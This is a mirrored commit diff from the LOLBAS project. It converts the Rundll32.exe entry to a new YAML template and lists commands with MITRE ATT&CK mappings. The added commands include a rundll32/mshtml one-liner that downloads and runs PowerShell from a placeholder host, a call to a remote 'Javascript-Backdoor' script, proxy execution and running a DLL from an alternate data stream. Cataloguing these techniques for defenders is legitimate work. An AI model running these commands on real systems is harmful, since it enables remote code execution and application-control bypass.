mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-27 04:32:24 +02:00
Changed all OSBinaries according to the new template
This commit is contained in:
Oddvar Moe
@@ -1,32 +1,70 @@
|
||||
---
|
||||
Name: Rundll32.exe
|
||||
Description: Execute, Read ADS
|
||||
Author: ''
|
||||
Description: Used by Windows to execute dll files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: rundll32.exe AllTheThingsx64,EntryPoint
|
||||
Description: Example command. AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
|
||||
Description: AllTheThingsx64 would be a .DLL file and EntryPoint would be the name of the entry point in the .DLL file to execute.
|
||||
Usecase: Execute dll file
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1085
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
|
||||
Usecase: Execute code from Internet
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1085
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
|
||||
Usecase: Proxy execution
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1085
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
|
||||
Usecase: Proxy execution
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1085
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
|
||||
Usecase: Execute code from Internet
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1085
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1085
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain
|
||||
Description: Use Rundll32.exe to execute a .DLL file stored in an Alternate Data Stream (ADS).
|
||||
Usecase: Execute code from alternate data stream
|
||||
Category: Alternate data streams
|
||||
Privileges: User
|
||||
MitreID: T1096
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full Path:
|
||||
- C:\Windows\System32\rundll32.exe
|
||||
- C:\Windows\SysWOW64\rundll32.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
- Path: C:\Windows\System32\rundll32.exe
|
||||
- Path: C:\Windows\SysWOW64\rundll32.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
Resources:
|
||||
- https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
|
||||
- https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
|
||||
- https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Rundll32.md
|
||||
- https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
- https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
Notes: Thanks to Casey Smith - @subtee
|
||||
|
||||
- Link: https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
|
||||
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
|
||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
Reference in New Issue
Block a user